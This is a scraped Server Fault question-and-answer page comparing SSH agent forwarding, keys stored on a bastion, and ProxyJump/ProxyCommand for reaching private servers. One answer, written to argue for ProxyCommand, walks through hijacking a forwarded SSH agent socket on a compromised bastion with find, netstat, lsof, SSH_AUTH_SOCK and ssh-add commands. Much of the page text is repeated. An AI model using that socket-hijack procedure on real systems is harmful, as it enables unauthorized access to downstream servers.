Bastion server: use TCP forwarding VS placing private key on server

The name of the pictureThe name of the pictureThe name of the pictureClash Royale CLAN TAG#URR8PPP





.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty height:90px;width:728px;box-sizing:border-box;








9















We have bastion server B.
We need to SSH from A through B to C, using private key.



What is the better option:




  • Put the private SSH key on server B. We read that it's a bad idea to do that in a production environment.



    From here:




    Never place your SSH private keys on the bastion instance. Instead,
    use SSH agent forwarding to connect first to the bastion and from
    there to other instances in private subnets. This lets you keep your
    SSH private key just on your computer.





  • Use SSH agent forwarding. For setting up agent forwarding, I need to allow TCP Forwarding. When setting up agent forwarding, a socket file is created on the forwarding host, which is the mechanism by which the key can be forwarded to the destination. In the Bastion settings at AWS:




    TCP forward: Setting this value to true will enable TCP forwarding
    (SSH tunneling). This can be very useful but it is also a security
    risk, so we recommend that you keep the default (disabled) setting
    unless required




    Also from here:




    SSH Agent Forwarding considered harmful




What is better? What about the alternative from the second link: ProxyCommand, I understand it helps with the socket file issue, but still I think I have to enable TCP forwarding, so is it secure enough?










share|improve this question



















  • 2





    With ProxyCommand you don't need to enable TCP forwarding. The forwarding is done by ssh on the intermediate host.

    – wurtel
    Mar 14 at 10:53











  • Thanks. Were the configuration file should be? in my computer or in the Bastion?

    – user2503775
    Mar 14 at 10:55












  • On your local system, where you will be entering the ssh hostb command, so that it can lookup hostb in the local config and know that it needs to connect through hosta. It couldn't do that if you put the config on hosta...

    – wurtel
    Mar 14 at 10:58












  • Where the private key of server C will be stored? also in my comp? I'm using keepass with keeAgent

    – user2503775
    Mar 14 at 11:00







  • 2





    I’m afraid you’re confusing TCP forwarding with Agent forwarding. They are different things.

    – MLu
    Mar 14 at 11:02

















9















We have bastion server B.
We need to SSH from A through B to C, using private key.



What is the better option:




  • Put the private SSH key on server B. We read that it's a bad idea to do that in a production environment.



    From here:




    Never place your SSH private keys on the bastion instance. Instead,
    use SSH agent forwarding to connect first to the bastion and from
    there to other instances in private subnets. This lets you keep your
    SSH private key just on your computer.





  • Use SSH agent forwarding. For setting up agent forwarding, I need to allow TCP Forwarding. When setting up agent forwarding, a socket file is created on the forwarding host, which is the mechanism by which the key can be forwarded to the destination. In the Bastion settings at AWS:




    TCP forward: Setting this value to true will enable TCP forwarding
    (SSH tunneling). This can be very useful but it is also a security
    risk, so we recommend that you keep the default (disabled) setting
    unless required




    Also from here:




    SSH Agent Forwarding considered harmful




What is better? What about the alternative from the second link: ProxyCommand, I understand it helps with the socket file issue, but still I think I have to enable TCP forwarding, so is it secure enough?










share|improve this question



















  • 2





    With ProxyCommand you don't need to enable TCP forwarding. The forwarding is done by ssh on the intermediate host.

    – wurtel
    Mar 14 at 10:53











  • Thanks. Were the configuration file should be? in my computer or in the Bastion?

    – user2503775
    Mar 14 at 10:55












  • On your local system, where you will be entering the ssh hostb command, so that it can lookup hostb in the local config and know that it needs to connect through hosta. It couldn't do that if you put the config on hosta...

    – wurtel
    Mar 14 at 10:58












  • Where the private key of server C will be stored? also in my comp? I'm using keepass with keeAgent

    – user2503775
    Mar 14 at 11:00







  • 2





    I’m afraid you’re confusing TCP forwarding with Agent forwarding. They are different things.

    – MLu
    Mar 14 at 11:02













9












9








9


3






We have bastion server B.
We need to SSH from A through B to C, using private key.



What is the better option:




  • Put the private SSH key on server B. We read that it's a bad idea to do that in a production environment.



    From here:




    Never place your SSH private keys on the bastion instance. Instead,
    use SSH agent forwarding to connect first to the bastion and from
    there to other instances in private subnets. This lets you keep your
    SSH private key just on your computer.





  • Use SSH agent forwarding. For setting up agent forwarding, I need to allow TCP Forwarding. When setting up agent forwarding, a socket file is created on the forwarding host, which is the mechanism by which the key can be forwarded to the destination. In the Bastion settings at AWS:




    TCP forward: Setting this value to true will enable TCP forwarding
    (SSH tunneling). This can be very useful but it is also a security
    risk, so we recommend that you keep the default (disabled) setting
    unless required




    Also from here:




    SSH Agent Forwarding considered harmful




What is better? What about the alternative from the second link: ProxyCommand, I understand it helps with the socket file issue, but still I think I have to enable TCP forwarding, so is it secure enough?










share|improve this question
















We have bastion server B.
We need to SSH from A through B to C, using private key.



What is the better option:




  • Put the private SSH key on server B. We read that it's a bad idea to do that in a production environment.



    From here:




    Never place your SSH private keys on the bastion instance. Instead,
    use SSH agent forwarding to connect first to the bastion and from
    there to other instances in private subnets. This lets you keep your
    SSH private key just on your computer.





  • Use SSH agent forwarding. For setting up agent forwarding, I need to allow TCP Forwarding. When setting up agent forwarding, a socket file is created on the forwarding host, which is the mechanism by which the key can be forwarded to the destination. In the Bastion settings at AWS:




    TCP forward: Setting this value to true will enable TCP forwarding
    (SSH tunneling). This can be very useful but it is also a security
    risk, so we recommend that you keep the default (disabled) setting
    unless required




    Also from here:




    SSH Agent Forwarding considered harmful




What is better? What about the alternative from the second link: ProxyCommand, I understand it helps with the socket file issue, but still I think I have to enable TCP forwarding, so is it secure enough?







linux ssh security private-key bastion






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Mar 14 at 11:27







user2503775

















asked Mar 14 at 9:33









user2503775user2503775

1586




1586







  • 2





    With ProxyCommand you don't need to enable TCP forwarding. The forwarding is done by ssh on the intermediate host.

    – wurtel
    Mar 14 at 10:53











  • Thanks. Were the configuration file should be? in my computer or in the Bastion?

    – user2503775
    Mar 14 at 10:55












  • On your local system, where you will be entering the ssh hostb command, so that it can lookup hostb in the local config and know that it needs to connect through hosta. It couldn't do that if you put the config on hosta...

    – wurtel
    Mar 14 at 10:58












  • Where the private key of server C will be stored? also in my comp? I'm using keepass with keeAgent

    – user2503775
    Mar 14 at 11:00







  • 2





    I’m afraid you’re confusing TCP forwarding with Agent forwarding. They are different things.

    – MLu
    Mar 14 at 11:02












  • 2





    With ProxyCommand you don't need to enable TCP forwarding. The forwarding is done by ssh on the intermediate host.

    – wurtel
    Mar 14 at 10:53











  • Thanks. Were the configuration file should be? in my computer or in the Bastion?

    – user2503775
    Mar 14 at 10:55












  • On your local system, where you will be entering the ssh hostb command, so that it can lookup hostb in the local config and know that it needs to connect through hosta. It couldn't do that if you put the config on hosta...

    – wurtel
    Mar 14 at 10:58












  • Where the private key of server C will be stored? also in my comp? I'm using keepass with keeAgent

    – user2503775
    Mar 14 at 11:00







  • 2





    I’m afraid you’re confusing TCP forwarding with Agent forwarding. They are different things.

    – MLu
    Mar 14 at 11:02







2




2





With ProxyCommand you don't need to enable TCP forwarding. The forwarding is done by ssh on the intermediate host.

– wurtel
Mar 14 at 10:53





With ProxyCommand you don't need to enable TCP forwarding. The forwarding is done by ssh on the intermediate host.

– wurtel
Mar 14 at 10:53













Thanks. Were the configuration file should be? in my computer or in the Bastion?

– user2503775
Mar 14 at 10:55






Thanks. Were the configuration file should be? in my computer or in the Bastion?

– user2503775
Mar 14 at 10:55














On your local system, where you will be entering the ssh hostb command, so that it can lookup hostb in the local config and know that it needs to connect through hosta. It couldn't do that if you put the config on hosta...

– wurtel
Mar 14 at 10:58






On your local system, where you will be entering the ssh hostb command, so that it can lookup hostb in the local config and know that it needs to connect through hosta. It couldn't do that if you put the config on hosta...

– wurtel
Mar 14 at 10:58














Where the private key of server C will be stored? also in my comp? I'm using keepass with keeAgent

– user2503775
Mar 14 at 11:00






Where the private key of server C will be stored? also in my comp? I'm using keepass with keeAgent

– user2503775
Mar 14 at 11:00





2




2





I’m afraid you’re confusing TCP forwarding with Agent forwarding. They are different things.

– MLu
Mar 14 at 11:02





I’m afraid you’re confusing TCP forwarding with Agent forwarding. They are different things.

– MLu
Mar 14 at 11:02










3 Answers
3






active

oldest

votes


















12














Use ProxyCommand or ProxyJump



I would recommend to use ProxyCommand (or even better ProxyJump as the syntax is easier but requires openssh 7.3+ I think on the client side), and you do not need to deploy private key on the Bastion, everything stays local.



Example with ProxyJump



On your client computer you write a file under ~/.ssh/config with a similar content to bellow:



Host bastion
HostName bastion.example.com
User bastion-user
Port 22
IdentityFile ~/.ssh/id_bastion

Host srvC
HostName srvC.local
User server-user
IdentityFile ~/.ssh/id_protected_lan
ProxyJump bastion


Then doing ssh srvC will connect you to C via B (bastion) without Agent Forwarding nor deploying the private key to the bastion.



In the above example, "bastion" is an alias to your Bastion host and srvC is an alias to your server C. In the HostName you need to put either IPs or real fully qualified domain name for your hosts. For the users, you need to update the User for the correct login name on the Bastion and server C. Finally the IdentityFile is optional if you use a local agent (e.g. KeeAgent or ssh-agent), but if it is not running then it will also work and ask you for each key passphrases.



Deploying the public keys



Of course you need to deploy the public keys to both bastion and srvC. You can use (the $ sign is just to illustrate the prompt, do not type it):



$ ssh-copy-id -i ~/.ssh/id_bastion.pub 
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
bastion
$ ssh-copy-id -i ~/.ssh/id_protected_lan.pub
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
srvC


Note: the above will work only if password authentication is still allowed. After the above deployment and verifying that everything work as intended, you should disallow password authentication on the 2 servers.



Example with ProxyCommand instead of ProxyJump



If you have an older version of OpenSSH which does not support ProxyJump (on the client side), then replace:



ProxyJump bastion


by



ProxyCommand ssh -q -W %h:%p bastion


As far as I understood, this is similar.






share|improve this answer

























  • Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

    – user2503775
    Mar 14 at 11:32











  • Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

    – Huygens
    Mar 14 at 11:37











  • Some of them use PuTTy and others use ssh via Git Shell.

    – user2503775
    Mar 14 at 11:39











  • @user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

    – Huygens
    Mar 14 at 11:43






  • 1





    Thank you very much for the detailed answer!

    – user2503775
    Mar 14 at 11:48


















5














I saw the answer about ProxyJump. Let's talk about ProxyCommand.



But wait, wait! I can write to you how to hack the server that uses Agent forwarding, that would be much easier to understand the difference!



Let's hack!



For the basic steps: you can read my post here



Basic steps are the following:



  1. Create bastion users

  2. Disable root login

  3. Block hacking attempts

  4. Change port

  5. Configure firewall

  6. Configure SELinux

How to use AgentForwarding



-Create config in ~/.ssh/config



 Host bast
Hostname BASTION_IP
ForwardAgent yes
User bastion


-Add your authentification key to ssh-agent



ssh-add ~/.ssh/name_rsa


-Connect to bastion hos



ssh bast


-Connect application server from the bastion



 ssh app@IP -p PORT


Hacking!



You may, well, ask me the question:




  • Is my server secure? And the answer is quite simple:



    • NO!



  • Why?



    • Because you are using SSH Agent forwarding!



  • And where is the problem?



    • Because Agent forwarding is dangerous and it's consider considered harmful.



  • Why?



    • Let's explain everything inside out: When you connect bastion host your glorious ssh-agent is forwarded. It means that the socket will be set up so that someone may use this socket data to access your servers. Imagine that your bastion server is compromised, If someone has sufficient permissions on your Linux server he/she will just use your socket info. As a result, all your server can be accessed. I know the window of compromise is very small because it depends on how much time you are connected to the bastion host. But do you really want to the risk when you have other options like ProxyCommand? Hence, just use ProxyCommand!


How to hack servers if you compromised bastion host?



Track Target



In /tmp directory you may see something like that:



[root@localhost tmp]# ll
total 12
drwx------ 2 bastion bastion 4096 Sep 7 17:35 ssh-mKX88v0Vlo


Let's open the temporary file



[root@localhost tmp]# cd ssh-mKX88v0Vlo/
[root@localhost ssh-mKX88v0Vlo]# ll
total 0
srwxr-xr-x 1 bastion bastion 0 Sep 7 17:35 agent.10507


Let's see connections to this process id.



netstat -nxp | grep 10507


result:



unix [ ] STREAM CONNECTED 501384 10507/sshd: bastion


and who is connected?



lsof -i -a -p 10507


result:



COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 10507 bastion 3u IPv4 501301 0t0 TCP *IP*:ssh->*IP*:8279 (ESTABLISHED)


We can also see socket files:



cd /proc/10507/fd/
ls


result:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


And what happens when client will be connected to remote server? let's see:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:48 11 -> socket:[502267]
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


We can even see if socket file is used using netstat:



unix 3 [ ] STREAM CONNECTED 502267 10561/sshd: 
bastion /tmp/ssh-oVoMXC6vb8/agent.10561
unix 3 [ ] STREAM CONNECTED 502072 10561/sshd: bastion


Steal Socket info and IP address



Now we need to steal the socket information while the session of bastion host is open. Oh, we also need destination server IP, so just use netstat:



netstat -tn


The final step to use the forwarded socket file



eval "$(ssh-agent -s)"
SSH_AUTH_SOCK=/tmp/ssh-EAKxOdL4fl/agent.10507


Check if the key is loaded.



ssh-add -l


result should be something like that:



2048 SHA256:2Psdl..B5KQ /home/usr/.ssh/name_rsa (RSA)


Server is hacked, how to fix the security problem?



Proxy command



Host app
Hostname *.*.*.*
IdentityFile ~/.ssh/your_rsa
User *******
Port ****
ProxyCommand ssh -W %h:%p bast

Host bast
Hostname *.*.*.*
ForwardAgent no
User ******


For basic operations: how to transfer files via the servers (from client to server, server to client), you can read on my post here



Conclusion



  • If you use bastion host, don't use AgentForwarding but use
    ProxyCommand

  • Always use non-root user for authentification

  • Use a firewall and block all unnecessary connections.

  • Use SELinux (In general)

  • Block the IP address who tries to log in several times with incorrect credentials

  • If it's not necessary don't give sudo permission to the user

  • Monitor your server

  • Update your server for security patches

More information, see my blog. Additionally I have some screeenshots, so it may be helpfull for you.






share|improve this answer

























  • Thank you very much! actually, we use also google authenticator upon login.

    – user2503775
    Mar 17 at 8:10












  • I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

    – user2503775
    Mar 17 at 10:42












  • Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

    – Huygens
    Mar 17 at 13:24






  • 1





    @Huygens thank you, good advice.

    – grep
    Mar 17 at 16:09











  • @user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

    – grep
    Mar 17 at 16:09


















4














Simply use SSH agent forwarding like most others do.



  • The keys will be in ssh agent on your laptop.

  • You login to bastion, authenticated through the agent.

  • From there login to you target host, with authentication request forwarded back to your laptop.

Advantage: there are no keys stored on the bastion that can be misused.



Hope that helps :)






share|improve this answer

























  • Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

    – Huygens
    Mar 14 at 11:02











  • @Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

    – MLu
    Mar 14 at 11:05











  • Indeed this is mixed up :-)

    – Huygens
    Mar 14 at 11:13











  • It's not mixed. I understand the difference. I edited the question to make it clear.

    – user2503775
    Mar 14 at 11:26












  • I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

    – grep
    Mar 15 at 15:46











Your Answer








StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "2"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);













draft saved

draft discarded


















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f958222%2fbastion-server-use-tcp-forwarding-vs-placing-private-key-on-server%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown

























3 Answers
3






active

oldest

votes








3 Answers
3






active

oldest

votes









active

oldest

votes






active

oldest

votes









12














Use ProxyCommand or ProxyJump



I would recommend to use ProxyCommand (or even better ProxyJump as the syntax is easier but requires openssh 7.3+ I think on the client side), and you do not need to deploy private key on the Bastion, everything stays local.



Example with ProxyJump



On your client computer you write a file under ~/.ssh/config with a similar content to bellow:



Host bastion
HostName bastion.example.com
User bastion-user
Port 22
IdentityFile ~/.ssh/id_bastion

Host srvC
HostName srvC.local
User server-user
IdentityFile ~/.ssh/id_protected_lan
ProxyJump bastion


Then doing ssh srvC will connect you to C via B (bastion) without Agent Forwarding nor deploying the private key to the bastion.



In the above example, "bastion" is an alias to your Bastion host and srvC is an alias to your server C. In the HostName you need to put either IPs or real fully qualified domain name for your hosts. For the users, you need to update the User for the correct login name on the Bastion and server C. Finally the IdentityFile is optional if you use a local agent (e.g. KeeAgent or ssh-agent), but if it is not running then it will also work and ask you for each key passphrases.



Deploying the public keys



Of course you need to deploy the public keys to both bastion and srvC. You can use (the $ sign is just to illustrate the prompt, do not type it):



$ ssh-copy-id -i ~/.ssh/id_bastion.pub 
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
bastion
$ ssh-copy-id -i ~/.ssh/id_protected_lan.pub
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
srvC


Note: the above will work only if password authentication is still allowed. After the above deployment and verifying that everything work as intended, you should disallow password authentication on the 2 servers.



Example with ProxyCommand instead of ProxyJump



If you have an older version of OpenSSH which does not support ProxyJump (on the client side), then replace:



ProxyJump bastion


by



ProxyCommand ssh -q -W %h:%p bastion


As far as I understood, this is similar.






share|improve this answer

























  • Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

    – user2503775
    Mar 14 at 11:32











  • Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

    – Huygens
    Mar 14 at 11:37











  • Some of them use PuTTy and others use ssh via Git Shell.

    – user2503775
    Mar 14 at 11:39











  • @user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

    – Huygens
    Mar 14 at 11:43






  • 1





    Thank you very much for the detailed answer!

    – user2503775
    Mar 14 at 11:48















12














Use ProxyCommand or ProxyJump



I would recommend to use ProxyCommand (or even better ProxyJump as the syntax is easier but requires openssh 7.3+ I think on the client side), and you do not need to deploy private key on the Bastion, everything stays local.



Example with ProxyJump



On your client computer you write a file under ~/.ssh/config with a similar content to bellow:



Host bastion
HostName bastion.example.com
User bastion-user
Port 22
IdentityFile ~/.ssh/id_bastion

Host srvC
HostName srvC.local
User server-user
IdentityFile ~/.ssh/id_protected_lan
ProxyJump bastion


Then doing ssh srvC will connect you to C via B (bastion) without Agent Forwarding nor deploying the private key to the bastion.



In the above example, "bastion" is an alias to your Bastion host and srvC is an alias to your server C. In the HostName you need to put either IPs or real fully qualified domain name for your hosts. For the users, you need to update the User for the correct login name on the Bastion and server C. Finally the IdentityFile is optional if you use a local agent (e.g. KeeAgent or ssh-agent), but if it is not running then it will also work and ask you for each key passphrases.



Deploying the public keys



Of course you need to deploy the public keys to both bastion and srvC. You can use (the $ sign is just to illustrate the prompt, do not type it):



$ ssh-copy-id -i ~/.ssh/id_bastion.pub 
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
bastion
$ ssh-copy-id -i ~/.ssh/id_protected_lan.pub
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
srvC


Note: the above will work only if password authentication is still allowed. After the above deployment and verifying that everything work as intended, you should disallow password authentication on the 2 servers.



Example with ProxyCommand instead of ProxyJump



If you have an older version of OpenSSH which does not support ProxyJump (on the client side), then replace:



ProxyJump bastion


by



ProxyCommand ssh -q -W %h:%p bastion


As far as I understood, this is similar.






share|improve this answer

























  • Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

    – user2503775
    Mar 14 at 11:32











  • Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

    – Huygens
    Mar 14 at 11:37











  • Some of them use PuTTy and others use ssh via Git Shell.

    – user2503775
    Mar 14 at 11:39











  • @user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

    – Huygens
    Mar 14 at 11:43






  • 1





    Thank you very much for the detailed answer!

    – user2503775
    Mar 14 at 11:48













12












12








12







Use ProxyCommand or ProxyJump



I would recommend to use ProxyCommand (or even better ProxyJump as the syntax is easier but requires openssh 7.3+ I think on the client side), and you do not need to deploy private key on the Bastion, everything stays local.



Example with ProxyJump



On your client computer you write a file under ~/.ssh/config with a similar content to bellow:



Host bastion
HostName bastion.example.com
User bastion-user
Port 22
IdentityFile ~/.ssh/id_bastion

Host srvC
HostName srvC.local
User server-user
IdentityFile ~/.ssh/id_protected_lan
ProxyJump bastion


Then doing ssh srvC will connect you to C via B (bastion) without Agent Forwarding nor deploying the private key to the bastion.



In the above example, "bastion" is an alias to your Bastion host and srvC is an alias to your server C. In the HostName you need to put either IPs or real fully qualified domain name for your hosts. For the users, you need to update the User for the correct login name on the Bastion and server C. Finally the IdentityFile is optional if you use a local agent (e.g. KeeAgent or ssh-agent), but if it is not running then it will also work and ask you for each key passphrases.



Deploying the public keys



Of course you need to deploy the public keys to both bastion and srvC. You can use (the $ sign is just to illustrate the prompt, do not type it):



$ ssh-copy-id -i ~/.ssh/id_bastion.pub 
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
bastion
$ ssh-copy-id -i ~/.ssh/id_protected_lan.pub
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
srvC


Note: the above will work only if password authentication is still allowed. After the above deployment and verifying that everything work as intended, you should disallow password authentication on the 2 servers.



Example with ProxyCommand instead of ProxyJump



If you have an older version of OpenSSH which does not support ProxyJump (on the client side), then replace:



ProxyJump bastion


by



ProxyCommand ssh -q -W %h:%p bastion


As far as I understood, this is similar.






share|improve this answer















Use ProxyCommand or ProxyJump



I would recommend to use ProxyCommand (or even better ProxyJump as the syntax is easier but requires openssh 7.3+ I think on the client side), and you do not need to deploy private key on the Bastion, everything stays local.



Example with ProxyJump



On your client computer you write a file under ~/.ssh/config with a similar content to bellow:



Host bastion
HostName bastion.example.com
User bastion-user
Port 22
IdentityFile ~/.ssh/id_bastion

Host srvC
HostName srvC.local
User server-user
IdentityFile ~/.ssh/id_protected_lan
ProxyJump bastion


Then doing ssh srvC will connect you to C via B (bastion) without Agent Forwarding nor deploying the private key to the bastion.



In the above example, "bastion" is an alias to your Bastion host and srvC is an alias to your server C. In the HostName you need to put either IPs or real fully qualified domain name for your hosts. For the users, you need to update the User for the correct login name on the Bastion and server C. Finally the IdentityFile is optional if you use a local agent (e.g. KeeAgent or ssh-agent), but if it is not running then it will also work and ask you for each key passphrases.



Deploying the public keys



Of course you need to deploy the public keys to both bastion and srvC. You can use (the $ sign is just to illustrate the prompt, do not type it):



$ ssh-copy-id -i ~/.ssh/id_bastion.pub 
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
bastion
$ ssh-copy-id -i ~/.ssh/id_protected_lan.pub
-o PreferredAuthentications=password
-o PubkeyAuthentication=no
srvC


Note: the above will work only if password authentication is still allowed. After the above deployment and verifying that everything work as intended, you should disallow password authentication on the 2 servers.



Example with ProxyCommand instead of ProxyJump



If you have an older version of OpenSSH which does not support ProxyJump (on the client side), then replace:



ProxyJump bastion


by



ProxyCommand ssh -q -W %h:%p bastion


As far as I understood, this is similar.







share|improve this answer














share|improve this answer



share|improve this answer








edited Mar 14 at 11:21

























answered Mar 14 at 11:13









HuygensHuygens

1,21321433




1,21321433












  • Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

    – user2503775
    Mar 14 at 11:32











  • Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

    – Huygens
    Mar 14 at 11:37











  • Some of them use PuTTy and others use ssh via Git Shell.

    – user2503775
    Mar 14 at 11:39











  • @user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

    – Huygens
    Mar 14 at 11:43






  • 1





    Thank you very much for the detailed answer!

    – user2503775
    Mar 14 at 11:48

















  • Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

    – user2503775
    Mar 14 at 11:32











  • Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

    – Huygens
    Mar 14 at 11:37











  • Some of them use PuTTy and others use ssh via Git Shell.

    – user2503775
    Mar 14 at 11:39











  • @user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

    – Huygens
    Mar 14 at 11:43






  • 1





    Thank you very much for the detailed answer!

    – user2503775
    Mar 14 at 11:48
















Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

– user2503775
Mar 14 at 11:32





Thank you! I work with linux, but we have some team members working on windows. It should work there as well, isn't it?

– user2503775
Mar 14 at 11:32













Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

– Huygens
Mar 14 at 11:37





Which SSH client are they going to use? OpenSSH (via WSL, or cygwin or etc.) or PuTTY (or another tool based on PuTTY) like MobaXterm?

– Huygens
Mar 14 at 11:37













Some of them use PuTTy and others use ssh via Git Shell.

– user2503775
Mar 14 at 11:39





Some of them use PuTTy and others use ssh via Git Shell.

– user2503775
Mar 14 at 11:39













@user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

– Huygens
Mar 14 at 11:43





@user2503775 I have never tried it with PuTTY, but it seems to be possible using the ProxyCommand approach, see here: stackoverflow.com/a/28937185

– Huygens
Mar 14 at 11:43




1




1





Thank you very much for the detailed answer!

– user2503775
Mar 14 at 11:48





Thank you very much for the detailed answer!

– user2503775
Mar 14 at 11:48













5














I saw the answer about ProxyJump. Let's talk about ProxyCommand.



But wait, wait! I can write to you how to hack the server that uses Agent forwarding, that would be much easier to understand the difference!



Let's hack!



For the basic steps: you can read my post here



Basic steps are the following:



  1. Create bastion users

  2. Disable root login

  3. Block hacking attempts

  4. Change port

  5. Configure firewall

  6. Configure SELinux

How to use AgentForwarding



-Create config in ~/.ssh/config



 Host bast
Hostname BASTION_IP
ForwardAgent yes
User bastion


-Add your authentification key to ssh-agent



ssh-add ~/.ssh/name_rsa


-Connect to bastion hos



ssh bast


-Connect application server from the bastion



 ssh app@IP -p PORT


Hacking!



You may, well, ask me the question:




  • Is my server secure? And the answer is quite simple:



    • NO!



  • Why?



    • Because you are using SSH Agent forwarding!



  • And where is the problem?



    • Because Agent forwarding is dangerous and it's consider considered harmful.



  • Why?



    • Let's explain everything inside out: When you connect bastion host your glorious ssh-agent is forwarded. It means that the socket will be set up so that someone may use this socket data to access your servers. Imagine that your bastion server is compromised, If someone has sufficient permissions on your Linux server he/she will just use your socket info. As a result, all your server can be accessed. I know the window of compromise is very small because it depends on how much time you are connected to the bastion host. But do you really want to the risk when you have other options like ProxyCommand? Hence, just use ProxyCommand!


How to hack servers if you compromised bastion host?



Track Target



In /tmp directory you may see something like that:



[root@localhost tmp]# ll
total 12
drwx------ 2 bastion bastion 4096 Sep 7 17:35 ssh-mKX88v0Vlo


Let's open the temporary file



[root@localhost tmp]# cd ssh-mKX88v0Vlo/
[root@localhost ssh-mKX88v0Vlo]# ll
total 0
srwxr-xr-x 1 bastion bastion 0 Sep 7 17:35 agent.10507


